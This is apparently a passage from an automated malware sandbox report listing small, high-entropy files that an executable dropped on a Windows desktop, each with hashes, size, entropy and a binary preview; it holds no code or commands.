              SSDEEP:48:O0BxETc4Cm/dJxkO9rEUggYimpMjFX4DD:OOxEo4lXd9oUgvimpoFoP
              MD5:AA0407D9B736A85BC458E0AFE3B96EB9
              SHA1:6063E0479951CFAA3093F897BDC04C4C9AF5EBE2
              SHA-256:00539F5B359D00930AFEF5B2E3C1432E35D777C2D65DB22EC603825B1276D20E
              SHA-512:BA2CF65C0914BA8F1DA01088A4606969328EBE0D2DF74ADA66063F86BE3C01F6C1961AC5137CA5D8C58E8056A032FBF861A5D6F8839E23B9B2892F90AA28C710
              Malicious:false
              Preview:<?xml....#.....Y.y/r.u4....b..Z..%.#..9I%x;C....eWF...<L...jD.^....pU.c.....T.+.j9.Y...#...w.r.&0...$.__b.l........O...?...p.4t~="......1.5W?*.}.vE......J...T.K"...U...5..#.%I44.G...t.o..#[~.+.|...."#..A#`......$N..x......0..O.5...[.....^.+...C....f...\..,Cg.-..{.[M)Tz.m]Fq.m.....p.r.c..q.Qwh..hdD.~.. .....1....n.o.f.fL.<.=G.|.q;P.Dr..v...fj....5I.3.y.....1$.c{....5.iD.7~d..'....Q....B..3...~%&E7J7z..Ya...2.dB.B..1....p.G.F.....FI0...}.;..{.O.....Vb../ygGO.y.PH'.gO.b.A.q.r.....T{................}j.'.~..Z.j...M...q.ta&...9.....:.RQV(.......v!..;..`W-.:..(...Fn.g.0G..^...._y.....Q...N.5..JE...:....*o.....JN...<.i....*.SCU|...b...S.]..xT.@.K...;..-%Z.~V~.U...!.o..z...v.].......8[.f..~.*|.=....V.j0..%....[.z.w...-b....8....5b.D.r.F..Xq|...&<.=-0-.LO......".k#.s....${.>7..:..NA.<..[.u...q.Q.y.y\.q.K...O..ISz.8...C.......=Y#...pm*..J.Q..%..q..A.8.P.0=........o.....e../t..`hB&.l......:.{...I.1U..F.K%..I..Z.Fi.~<...C~nWG.)fb*....1.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.87953206246208
              Encrypted:false
              SSDEEP:48:Ctbo20w3WGyLRN+JBz5KROOzxdU3PuZ7dDDCwl2xjgD:CtbWJbqBz5KA6RDus2a
              MD5:6BEEB2829F51F385F489A76EC30C9260
              SHA1:5B3BF3A9FABF9EF49757B29BC745147B2B43D7C4
              SHA-256:A647D5AEE29C2B4AE599327CAEF0CDBA9DEA1A7998AA46BCB9AD6C525A0E24CD
              SHA-512:52425A4E1FD1BCC904A86575140CA2C829566481D2936FE348CAE6F91481623724F77F8FBF26EE7CFEC2727431F65602FEA9AC87E2950E5E5C93B7F3061EDB29
              Malicious:false
              Preview:<?xml,oQNL[[\..z.7.6..@.B..........O{.F.I..qT.zjO.$o...7M&...5.#}.............3W....a..|.I-...K.[.E...F..7.....[."$..u..K=.=b....p.....0...3..~G.)....3.$s.2...+..}.....db..%U...JR.".xb)'.......c...s.d..c.T<|J.S...+..3.5....\..S9U.x..N.*.z...Z.K.x3T....Z.+.J...t. ..w.../:..........T*>n...:.1.,ZX\j..9...\.0..,[.1Fe......]l....e.E.^.G1....E.O..Tx.E2.Rbg.$dR.H8..!.XF=$.._a...J..Pq..A`.........>g.,>c.8..?#.......JvZg........+... ........pj/.....S......*'.l...y.........1..J^R..Ib4..rc.f...l...1k.YZ......V\n........ZK=*.....D....<'.iv.@.A"}.N8fp...Zk..V|.).0w..?+...6'obo.d..ZH$....N...d|-.Zf\u.Fg.A....e......h#..%.....5..j..d......M..yOcE8^..3...C..NnD.Bi.0..5......W.@.....|.!....%.u.\J..{....W..u...B.c..v;.[..[..2<..Vu..Jqc..T..B}..5}].o.F`...#..}..De'.[.m.$j.J......^..d.#W.F..E4..}\.uZ..*...e.f..........PY].q.Pp.n.........M...<Uo).Xy.Lv...O...'....p..7..3..1.P...[ue.....{....9=..Jt.s..L.,..,9..-ES0=C..x...8prx....'......".B..Fr.^|......J..]....9y.L...<.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.877012342636876
              Encrypted:false
              SSDEEP:48:9SRKZSJw/kT7Q2Ql4Ao8RNrmwj7jMgNTR8nmFGD:9yJukT7dM4A5fTHjMQR8
              MD5:086CDF7C287E8C8A3C7A3164500489B1
              SHA1:4EB953B1773273FAE532C207FEC2FED29F794A10
              SHA-256:61CDE08C2456BA546D786A2BF35F37625FB7E80E68C33CF7528C8252DAF05FE2
              SHA-512:E46923F65C999D32540DE0253BC08D21CBABE1B717D7FF0032B88026DFCCE7F565EDD3F4457F4C9AF074894925DC6ACECFC867BCA740E33F8D0A797C21CA6E33
              Malicious:false
              Preview:<?xml....>.D3.9.{T<.~!<.6+_-.f?...T&.....,h9m....PA[..w..yo?..IB..{..%....x1yvP.z..Wt.!.6..V.Q..l..........,.pr.[...?z.+.o....!......r.4r...3....M...JHz.....`...<-...s.=._.33.'M#.&...+#<..N..s..X37...:...7.\.e.\0..<..........6.|B............:.../..;y....1..........h.M.i..q.W..xH.&I.q....,1..R.j..p..t.IPJ..$..1n.~F...:.o..u.f..[G6....x.....0>..$.......Z1.<.i.i.1.....#w...W.4.M#..=o..[p]'_.d...K.X7CP!f.13.jT.7eEcE..lW...+.U$..|...a.E...6.eH...Nr{.D3.R.2`j..P.J&..C......vz<=DOc..._.[....JY..@..EI.[...2..6.E....j~Ef..."....Jp..;R.x'7..q#U...f.Ggi."PEM1rjZ..........0..mN.5F.f.I.Z]Q.....!.l<\Bv....z..W.;<...t.&^....F?.....8$.....".e..u*..#8....b..=..d....Uo7..q-......o.....rC.9].@......Z.J....Q....n.9......X....n{..Z+.{.89D...>..M.=.sVt.H...pP.....W-(....R......@.........f..!./C?..1. .~@.+.jP<......p.7\TB......,....d(.R.6.U.u...,...........87.U.%...l..B.......y...-S..{q.|h...Rg.......f..._..$.n.|...w...@...s.#;.:k_.|.........c{N
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.882459912004751
              Encrypted:false
              SSDEEP:48:Pd7I2N6iE1gAoefHVG7iT/wyAXaWtQEJfNx3OD:lpN6P/169KGQEFG
              MD5:4542A4347E74D26D11A1DEFB943EAF17
              SHA1:B8F14416BE8B57B3C4C0AF13AFB3398480123285
              SHA-256:F3730C3BF9502CDE2FDDF2F3D46264A0483909F3CE0EA9F7D89A1DECB9BD156E
              SHA-512:55F05044C1A9318D62C59E1E73F86A4ED3354A2715188730D60743637110B34CFAD1238C761FE329E7471A34CA5E9ECBECB6E9C6FED10BB990B2595857FF38DB
              Malicious:false
              Preview:<?xml.k.....=.{....0....WiZy>~.A..%.Mz..i...W.O,Q....u..y0=B..Gb.A..C. .......l...)..S&.x...J._..R .z..yM...*^:...;8_.....>..r...o2...d-.`.`Y......].-.X...w...%..........)..NTc...M.....).C.a>S.}+g<.@<.2.T.u]O..k..).2.qt5bz...#..8....h.4.(..*....tS.%,.L..i?3a...7_0.~b'...Z.....8.6.O..l..rq.,.M.(USQWl').....U........$.........8U.#.@...M.. `.4.G...s..4(..p..K..x....]wp...Q..6)X......H...M.q.X....}.`%.L..u......D....i........b...Q.g...aR;._.X..dcU../..S..(.~....C7\~.../..!.[..)A.1..u.......SN`;*C.....p...:=.....E,.....as-_/5...>..E..\Umi..$h...Bm.o7kM)...=}..o#[F...*..|5J..f.*5.....}m..6o..du[..XM..B-?.Du!.....^?...O..13....!m.Y]M....Q.!........N$..7.....8....)...c.K.....%+.6Z......T....HW..7N."...^....$....WG..I..k..(c...|q.k....a{.b.pK.....|.....d..}.=..S..{..x1_.....Yk)g....reK...?..+.N..5.W>.....^...{.qJO.l..E........Q.DM..-......r.z..4.W.....l.Q.d+.7..q...i.a....@......*..&a.QuM!...b.^..-..vN....I....5.p.l.K....K....A..}#..-Zq..A...G.f...c.......F..j
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.896946298557425
              Encrypted:false
              SSDEEP:24:cjQkoiSHXGX2XQ7pVgMYsEVJzYJAjP2gvO9+1Hh8eWiqp3xwqFT87j7bD:cjQko9HX1XyHzXOAAx/WeW/3xTGD
              MD5:8EB8D791F05AA0BF29A30AD5905E0629
              SHA1:634945E681AEE1109B28ED44A40B12A10D6D6471
              SHA-256:0D5558697F5B91BE4C0132251DBDD24008B07AA07774C73E63EB8D70D2BD0F4E
              SHA-512:261E70B9257B4D92B5DEACB0FC31DCF7DC5779E4C3A938B80A78F2F9A59F144434C485BCD2DD283326194E2779F547A2F3B046E19BBED8B491FF5F368AFC91F9
              Malicious:false
              Preview:<?xml...\^...+...0..T.M../XP&..o.H.......:..=..vm.w.2.{..m..o=..o...#....*.H<..^R...x56...d$....&*96./.`......Zo....~..I...F.z?W.......$...i.....^.jN..Z.o.....h.0....-lss....V.~..i....Ag2...[....T...m..._....,b...(..p.d. .g..e.....H)tOE...o8UA.<./|.XK..x.../-....w....k....n..j......#.....&w.L (.....P.4..t...1&.75.kq..,E..J....v...N.8.M&......W+..Hz..bV....X.X..Y...."...=..."..a..`.k.Y.*.lB#......;#...J.....E.04.............P.1......p...n.h...(.g....0....'xh1..vK.......7'g3....@d* .F...w.p.u_.b.,.........k.z3...m.=ob.w.I..\....F..,N....Y.\.e.+.......-.]`|..7....g.(.6..o0._...G...+.2U..,Ck.4.S...|...j~.BU.pWo.KN......u:.`...qw..>{..+V..k.l.:T`.......}..q...E......Z+Dp%...,.<...\-.yX.;.D...|pN...eQ.H....sA....[#8.F.5[.o.'..5+5...e9........D....4N.g.U....".K"Y......k.{.$...M.^wK.$.@...k..9o.Bh.k.*...H...._..l.Vb...K.h.z.z...."<.l.2[WT?|.=!.F...Sn...{.......H.].?.H4.M...~.u.....b]J$....3..P.%!z..%...0vm.n..@Zl9`3.[...........Z.I..Y.-.I....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.889280019482789
              Encrypted:false
              SSDEEP:48:y6/ApgCI87/iX4X4nBEVcGaN1knDW3QX/K17MD:yYIgCNDiX4X4ixue
              MD5:5AAE421B31816D265711FC2071F5771F
              SHA1:5BFE0EC2001F9C09FBD62728D79A9D96DDA8EE8F
              SHA-256:562139F730A7B2397DE397FF8BC0E044B8BEC019958229D344A5354A46E43A3C
              SHA-512:2E4099A1DBAE1A2B1B8634299CFC4862163F9B5E5FC78F42F6D52D21452239E4F81A71274931F9A5FA020A46B50C2A64B090556598C28C17038D82D047B6109A
              Malicious:false
              Preview:<?xmlG.....j.V.Y..;.......p..u.r...>R....z.._.fc..F.m9^...e.....Q...2.l.S.-q.e<t.....!...wf.3+.9:........I.R....-D...G.K...(.<...p"@._..@.*e.......HP .|N...].A.r..I......O..4...9-r-......... ...N.W....P.im.%....,....& ........&]....<..F.....i..;.FlI.(..j....Q..[...d..cY;...v..{...t$.7.6.1.* "EV.A.&...b....#.e"=].w.Ub.3...m.d~5.....&)*..=.$..p..C.j.......:./K.h...]..\....&...^>j.U.i.X...^U...Tb....7ZL.|*d.w$0.JF...M=.r..k!..Y..U.).T....g...ul......3...9._v..-G.F.'..D..j0..[^.....x..T.2.&...1!9..$$..._P....q3{O.r.D....n..n.)..2..@..m..4>.n...V1n.1,s..X@06.R...d.K....ES]&$..^......b.8"J..o.J...)"./.z.%.U-...g.x...X......x........*p...x..(e.I#....s1i...%.3..y.z.......2..'....4..NC.v....5...<..3.Q.../.].]u:I.m_..^...m.m.g...0...4iR'..a%..9..[..M...O.^......F....;..7,i.-.B..!........P..E....d'.H.G..:.. !......K.i.S...0$.U[.?.o.n...X.......W..|..C.pmwI?p.q.....h~]}.,...*"%..-.Z..gD..+H..b.....f..P..#.h.0T..........C .N.["f.".^...NJ..%L..~"n,.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1700
              Entropy (8bit):7.890794389902741
              Encrypted:false
              SSDEEP:24:1Dj6Kw+WT1FWJx45Kj6KmRsc0GvMW+NuGkjWKBTL+KiDozw5/ewIsrbYc0GmZRrs:hj6KwdP8GgfGyaHBTn7dw9QGKaD
              MD5:9127F0E85ADC0BD81F2E8691A9AA3524
              SHA1:313FCE93FA9327F77E3897AB83E746D7B09422B9
              SHA-256:735BBB0853F99119A9AAD5C3D57485A706616AED67FBE0C6C9B6559A5489970B
              SHA-512:57F7AD3805A86045DAF5A1D03F0506276097D29F72696C2CB24BE2CF5E399F7E82C69A5B71C2A9BFD30A57AB6E52494208A78692F208434A58424A8A70C58921
              Malicious:false
              Preview:<?xmlSh$v....".f.....Hg".-....s.............._..l..`..fv..i3!<z...%..M.e.j.44..%.....\#.......9.E.I....n@%....;D...b.UysUi......;=.o...j.Os......K....M...^....[..lbJ..o.#.T...NwL....z..e..60_.]X..Y]..QMFE..G.k...c:..4+/v.. .d.wQ~.u..kR....B..=!.'c.x......M.n....q.i['..Mi...|1.w...T../Q.`@B..z......]a.o.....S.../.df.a..He/Y.c....C.[>.$.....[u....=..P{U.LF.......&..&...u..U.v..1...xP.F....xvH..5d.@4..m....o.F.{`..F.pp...k..1.9.?.....O.H~.....R...:.1...Y3h....|..QG...Q.w.@.|...]Z.....~EQ...&..q..n.zi.t..n..B.c..(4T.;).....Ke*..uy..........=....7...BrTd'l..).....O....~..L...e.s...cT0.#./.O...E.,*..d...&..j7..Q....W.\Nd..QO..-.)......8].......".JX..:.".%...p(..$.f.......+M...v'N..u..0C.l...k<>.....1..7....'.....d\k.G..u6...G+...l(.p.J1.j..e...n.A.....[A}.y.fI.^:`*...FE......W.U.:...-(....|S...g4/w>Ol0.FU.-D6L..U.b.M..5..{C`q....>H...D..9..(V....x..=..o.=..^.(....D.......Nf.F9.h..<....5(.BF^b.q8.1..6_...V..~.*..^...M=w..&.~XA.M2..4............
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.887767259490755
              Encrypted:false
              SSDEEP:48:6WHIcT7v6jIITx3UwvnwgFKUmZkQpf6XYXU0zuvnVLD:DTNWx3Uwv/8qQxFU06vVn
              MD5:819E12239590C515A6426822DCBA23FA
              SHA1:337F450565455BDDEB58B7AA746592AA8EC17688
              SHA-256:85BB376DD48B3185E5AC333DDDCAE1B9B086525203017FFBC85C421EFBDB2157
              SHA-512:A2199A2AA1957B554CFC532AF707155BE275FC08C76E89A33A351154186F457383912122BC6492F878D1D9B9B1248A4B42A48AA04EC672F4A6D573D802BE82FD
              Malicious:false
              Preview:<?xml3...y..~i..eN.e.K#Bb...u......9....&\[.'....a.F...%.A.ZF...a....j.1xn..J.OU.8W.=..... ..#.u.`.J.. ....@....]b.-...[n.x....$..Mr...3z. 1'.I:B....]NFU.s......a....dq.iL....F..Z..p.Xsu.o..1J...1J&&:..?D.jsC..K.......cN.,...zmp.....Lb.^......!T.IYB..D.q..'k.$...hX.2..y3....!w F.M`._X..#....x.3.I..v .t.<.=...9.B .......J...u...rcK.....;....!qwc.....u}/....#...W..6.._..a.!6........3.3....j..L{2Y0.....HS.....C."4.*S.......)2..8(.h..?' 7]>.u ..nK~.C...Z.u.T..>.f+..I.......:.......5..a5].....>D^..]..eF._.....]Y.......:.d..X..bnH...}......1."t.}.V.<.............?8V.u...D.D.WMU...D.....d..|...8..e....>p..PS..1..v{..S.am!.S...\-=)j......Q}EX......}..f.!.........+f.l..5....}...f."}.rl....z..0..qE!...y.i$.k...S.M.S..D...M.U...?`i.y....}.G..#.+.H..X.g7...5..q.....s..'.hK.}....1..41d......t..9m.-."E.q.... .W........#.(...t+....q...<.z........L....i.QR...M...D...T'.dK.|X.?..:"hX.bb..-..A..(..Q. .QJ_..N........-..7..s.Y..?9.._z'.{c.~..z]N.......~
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.880065106969209
              Encrypted:false
              SSDEEP:48:ymXQtL/LqTpBLbfmO/krIsCnSrXsTUJGD:NQtLjqrrmOu7aUQ
              MD5:6139260A4EF2F213B815C3B223CBB237
              SHA1:5BE006D4D3B0CAE0AA71F3B993D51E26DAE2A3E2
              SHA-256:791F08FC01F443D2C1A5A9E45F5715D72B4D156ED760911CF053F4B0059954AB
              SHA-512:1E19F749EF6C66A4B8D149D95446F3C646B6F826902192D78F89EFF58BB32C60D354939B626CABE92FC069D6A0A99DDC1CBC1728A3A60048DD6C5C479F99770C
              Malicious:false
              Preview:<?xml.7Amx...B5..'..s..A.U,.......V<..2...3m.h....T.....{`.Mf.6..............X...f.._.......B.q..*....VgA...[.)...W...../..$&.O.].0......,`.....;A.....H}l...&.y..k.Vno.U.z..i...QLR..@...u[Z)`h*9...("...~.Q...m.OyZ"..5e......j.....t....N.Q3}....+..O.y.....F..a.p?........f..._......DN@......u_....^...{F.p.....Z"...S.....-|.'.......w..8..Z..F.P...q.>..U......yg..v..z..m|..`.FQ.}.g22..X..jg..%..............J#pd2..Ru..im..0.n.3&.5..v.Y:...l...N)5......|&.k...E.......P>...}3(.._.A.*....e.J...;-.F8.U....f..5Y......g.q.}....W=)I........j.n...b*..,...n..]_...*r...O4yh...59.4.\..n..vi..<.Rj..g.{p.b..\..!+@.......u..'.l}./..F,..+..R..{im......*.t-"...Hx...p.....%.`!...H...k.E.a.m./...y.:...2..j......#..\).j%...RS.7...t, ..Z....$......p@..Q.M/....6..Gr......=,I.1)l.Rq.s.$...y..._)..L'...m....,"D._.e..XB.K.ei...M.tv6]0..':`8..y.Ob..v@.VC.a....C.J<Oh..(`P..Y...y4.~$....'..%..Q!hT.2....:B...A....b...J.e2>.....l.:.%7.r.....(@6(=J..|c.....Z^l.'p..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.890877944471335
              Encrypted:false
              SSDEEP:48:onp9QuQP+ry/6Mr0cUMI4vKfwEKCvo6/D:6suOH0imvp
              MD5:C97BFC835934C131BF711530C8A21D3E
              SHA1:18B5F6C3EC403EDEBE3267CBB5D35A03828D757B
              SHA-256:FD2846C832DDD8CAAC054098AF0E27B87781A4B87769416D94D49C1E0F8F566D
              SHA-512:D08A7B85C1DF70D439877D16D804EA2C36BF4B4A3F046527BA4D917A258250664199EF49BB17A1F3604B68CDF4573E0A9DDD8B5E2E6BD841E9E1BC9809C63DBF
              Malicious:false
              Preview:<?xml.'.......,'.z.....w..:..c...T.cm.c..XZ8.....s.+.>:.DM...;..Q.........}.DjK/..U..Dz..m....q.>U.Xu..e.... .N...40R..EeO..>...w..Q...IZ.....K..x.q..{...&.)Z.g.r..w.]Ft...=..M.O..aK,..Ix....g.<..y...4..|...W....}t|..E.|.!'v.w.s8.\..=DL.g.......S.}.M...|.7.}..~ ..G.^*.b..1.O...I..... ......" .......S.a..E.I> .H...C.9....(8;...(NW..A...]..U2.@.:..Y.n..q1..S.....{..'S...q.U....6n..Th....N.....w...X..z0.\n...^........I.....(?....o..b.RZ..].9.8W[..O.F....T.:...t..y.h.(<.yo.x..(.^.Mvy..Gs'.]/q......."!..6...\G...W._.q,....W..oH....`S...*...\..=}..W..2.uS.+GL!!....#.........'A..\....;$.+."Q.1-.....~.J.7...j.........>.V....m..Y.!...|Kh.?p...bX..`.#.....\&E..8v!.c..VJ..A..k.).w.\.x....8.U...n..to.j.w..*a0H.....x.2r....R....O..1.......*..lV..O...Z.l...>.PK...^.b4..@Gh.d...0.jU.6uW....~.f..E..6..,....N.........6..1..v....J...G.......".5.&|l....C......,.....+.n.a..Y....L..]......+}.C.D.....O...l..H..TH.T9.(..e..jsQhfBNb.HQ....\.h\....-..~?..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1687
              Entropy (8bit):7.89107662954507
              Encrypted:false
              SSDEEP:48:HhiR93Inb//mgtBqzOh641zSC/9yKE87oaeQ1EhVVDdXtDFdZg/aD:gR94nb//DBqzOQ48myJE1EVDdlZ5
              MD5:B514A2150D3E965D5E463C1DADEE2F0F
              SHA1:5D36B604E80E64CB3B4E997B470BBE30BF66E1D0
              SHA-256:8C526CE55B5F5BE1143E4E0ED842EA843EFAC78D75199DCA3FB0964E3B92DD3E
              SHA-512:05F3DDBC10DD9C3E32630A7F64D5DA91B48D9B33A09FCA262CACD8993189A9A21E2C8B133881FD86DCC09D9017F38C6E6FE421E3276932618FCFF1BE3CDBD6DB
              Malicious:false
              Preview:<?xml.+.-..(..v..i-.(.......Qw...Z..Bn..%q.(*|.K.l...9.v./.}.AV....]F.1..5/.uQ.....<.g.79)i.'....D.....<.......G?..E.^X.psT...DPk....=....c2u.^........*WWj.A$.~..)...0.......d:]v.}.*....X...o.L......P/o.............){fx.Z.c.S..h.).5..~."....C.6*C....gl..e..........l.eB.Kh..vO...bE...+@P*{SL.....F.'..v..s.d.03.ed ...j!.Qx.j.PG).M.......|.5.<9.i...#.Q.C......e.r.8y7..~...r..l.,.X]fx^.O...K.a#A..O........._.0..h^`+W&..U...P}....<a....N3.y+6...V....p.?....>..Mv.2....ZL%..._5,....x6...9.v.)..By..ds.].c....N.....$...f-6D......../..p[.OW..a.xy..$.>]]~?.f`..*r!./......cQ#..;............d...P.'5_Z%,...e.{...iG.../......p..[..B.R[.x.V.s....>..8.."u.U.g.zO#...=.o.9.V.H.5.-|.%[>..E&.>#HR.b..1`..|.J..|.-LbA.d...P...e..Sb?d.15...<Ng,..*WMB....9..qK.d\.|(.,.HZ..P6I..m_eJFvK..9+G*US..g....5...=TB.Lk..&..B..`.vdQ=.-..q{...3q.K..A()..Mtt.g.3..M.z.ou.wd.....7..o./.R`...o,#e.P.|T...6...CH......}...~s.w.kKX.<..Pe._..:....~<j.~..?.}.....Uy..r.)..|Y.C.F..+f...y.LN..K...wIp...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1724
              Entropy (8bit):7.887005176273579
              Encrypted:false
              SSDEEP:24:22QxjqZ3uHYeL9KlelOM4VQUJXeEqBqMiicoz2sZSahodmLSQmiYECa5lw5AS42I:bQyMYkTVo/GPd6sa4WAlBD
              MD5:99D3D45AC5C8139A5D6C60D5F35C6C7D
              SHA1:98B23EFE9B00F7488000C0939FE3EB8B9C4215B7
              SHA-256:D5011BC2428CC5B2D09FC6BFBB76FE0ED672DAEEBD96DD396C56DB7B8FAC1B59
              SHA-512:535A103B76E4A090BA4C3DBC4D2B58B93DCAADFF697C27B918D12ED5CE1114FAF31CC1FB48E942795D46138F25033D2CCA34C406F76E9BA0CC2BEDE1CA7721DE
              Malicious:false
              Preview:<?xml..Z./.......6.z}.s....}1a&.,.9...JBc.. .&.T.i...f...c.N.i(..dY.NM~....h...).c..!A..kK....6`..{Pc-?.....^..}._+.fR...Lt_]:....kc4.+u.w.UB.>........"..y.]iPg..~}..d6.`._B..$..H0k..|..5.I.8....W.E.y.....4.....).u{q..X.U..?Zi..B.(...y.z5..gU.$....h.....&.;&.|ub......ST..s.Bi.l...s...K$..0.M*.....T/3......V...'.r. ...(...7.........*q......#.b...t^..6.H.!PP...n........x..n...a..RJ.._7..3.%dD.[....O.r.h.f..Ku.....r.q.yk........ ....M. ..a.s..X..b/.h(.2U_..9......r...5E.^q;.Z.......H..S,Zy.G.X...u...Q.K.{..u:l.....z...c...w+O...C.x..i........%.yb"...3+....e.A.>L% .q.}R}.......F.\...G...........u.....}...L..3..... .Fd....{..g.i.#.)/.p.$..l.+.a.To....$.ZL.$FEn.]...1FY=[...`D..OY.f.*.....wRt.UZU...kx.B.li.....GcH.<b.*....#k.^Y..W.+8..^.O.......,da.+..K.Od*..>o..Q..zf..Lf.......E..L.../..m w.. ..w.`...&.|...^..7....@..Q~dJ .Twa..K.Q._y.!.H.")#...b.p......s.h..@.J <.?@In}0,.H..*.h...a......A%..%..^...V......j.b.....C0|..6?
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.897028084077914
              Encrypted:false
              SSDEEP:48:6kaiePx2LM4kywl0pKgc8tKtuQlF9bu6D:IPQUWp7tIFF9buS
              MD5:47D354E652C71C134663FFCE8DCE91D8
              SHA1:1C4B787E727131FFF7B52242550C3DFEF547C604
              SHA-256:374A06DF2C50B8B55136622F971AECB234A0D3465D6F43C796122AA932BB2A1D
              SHA-512:DD85BA01D2439396F6737ED7F2DC4974EB3186CD5FBFBC0D211DC9520D29C7613DB68AE282EBD2811C8D295A47833113442EDE216F0CD3B015224D0A95CE393C
              Malicious:false
              Preview:<?xml`.T`h..\\be.g.}.Q.cg+y....4.|N..=.`o.o..-!...UA..A{!.\.H3N.{...7.X.u...l....%...~.W. ;.s...a..fQ!..."...8....k.:9.....NB..w...lO3l.T..D.!.}.....o._......I..Q|_C....%.d.8,.l.2.....|..c.........8*.aS..c....[.Lh.....:L..~........`.."M..]X,v68.(I. .......?G..I.u.O.{...]..A.....S.P..5...I.,.......?L.qd_q).`...N.WnH...N.fHvX....P.p ...K...t.:....1..P:'.{..'yf[D^..|.I.....&...|p/<...v...I...@...t.P.E....._G...6.......z..<~..@..s,...#.-..v..'..\.u..P...iI....]...........>...g...\+EI....s.<m5.8....t.S....nvu....[.>..|!...#.z.=..0_...+.%`.V..(2d.X......0]0#y..2en...r..Q@..R.C(.....h....Z..N.e.../"2..X8.....W..w..p.....^.....{.`..2i.Q..*.V..EY..k.......C.U\..v.#j...9......A.Yk.>.xw.4P.[...>.s...B$..`.9.4$.b...(..a...r.Pk...'...]..6.Y...\=.;q./1.m.`..k.GJ.}.u..u...H...(.L.dr..r.h..z.8..3.tK....[..xw./1=y.K.*...'..z.....,.w.......;Z..r.)./.r..:[>49.`B..........g.J...1...5qj.#...).....6^.y....g..PW..U.../...g..w...s.'...S......h0F.y.gh..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.886901775744272
              Encrypted:false
              SSDEEP:24:Z1R0qkePID/InjDwhtkv5U/byenysA7PXh6mhhUh1cTFxcdfHcczIdsoyFAwVbD:ZPBkeDmt0UzTy97PIm21c0ZHKKtA+D
              MD5:A6334414DC1638DF3838F6749AF18F04
              SHA1:27A03471759F5EB1E02C9AD855AFFD96D0D1D04C
              SHA-256:CC48B6095654D58821535CD6C8BC77447261A617A97C3CA99D1B46F981155257
              SHA-512:1D5DAF7F8F3446E2B25F94B5FF71525E7001690AF0174D8CAAFF2AD79CBB7B4398F6EBD6255CA6C71F82581716B938727FCB11DBFB52D10F29E5D2DB3E427E5C
              Malicious:false
              Preview:<?xmlf.ar..$>D2l...-}*.ig...^....! 2M....=....*....o...=..b.D....Y........+.....#}(..$\(.;. fQ..f./9j........-..Mj.w]z..Kf.....i..6.L..Q.D1.J...;....R0..s...;..%.*@.#n.?.Nr..\.u...(.../ZJ.!.. .....6*....e.?.....T..#i..1...i.7..........1.......[.....'...q=.tWs.Q.1..j[.D...9^....f~....&.2F..5..vIK...4/.K...'..F...k.oeA.H.O5pz..[.y}......O.72@F.fYl.v{w.B...7..q.C.05..-.....M..8....q 1.q......DZh6.7f.ir.?....../.3wa.l. SH....4.3{..c..^~.?...bY.?{dI...v&.<.S..18W....^...z.c.S..1..]/\....Q.0.T..\t..c..%.M.{A.>.g...d..j2......e.H.m.ht+t....-.{ .F.#...^s...e.9.&Mt#.5.zl....".......\bi5...w=^]YBVRBX@..l.ZJi{..Oj.dv/QLR.DitO..i.G..B..2.p.f...~.R[......w.*........H........(8y.w>.(a;=..T...<..T.r.Od.Fp..#....D.G.X.,*t..L...c...z..i....{.%!._;..0..N..\.....>..s...y...g.29*.3....[W\......_...!..S....2......... .......=.:UQ:.2X.o..(.z....q<.,......!.e.U...c!.U.?.5..Y...........|L-..;Q.....&..=..#.z.Hgk..l.$.\..<.(..O.?V..Q.]SP.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.873379752542788
              Encrypted:false
              SSDEEP:48:VzHcsxM+qa16R7ObnZoOGOtUd+q8g3IKoOe+ceED:Vz8kM+q39Oby0tel85VHZ
              MD5:826EBB0863ACEAE5864ECB858C37A7F2
              SHA1:7BCCFFADBAD7ACB8DF881CA38765B40866437B36
              SHA-256:B589A9471884532B6AF7A3D050AACF5481C4BFCEA8112B5803E946F14E758C5D
              SHA-512:E40029D765E121B0AE38D9D0320CF2E75EDCCE05F00132F66AF76BC0CA45F50895C40DB743B344A542F12D73A8045B41E08EB78646210EE2278BE2A7900C0F88
              Malicious:false
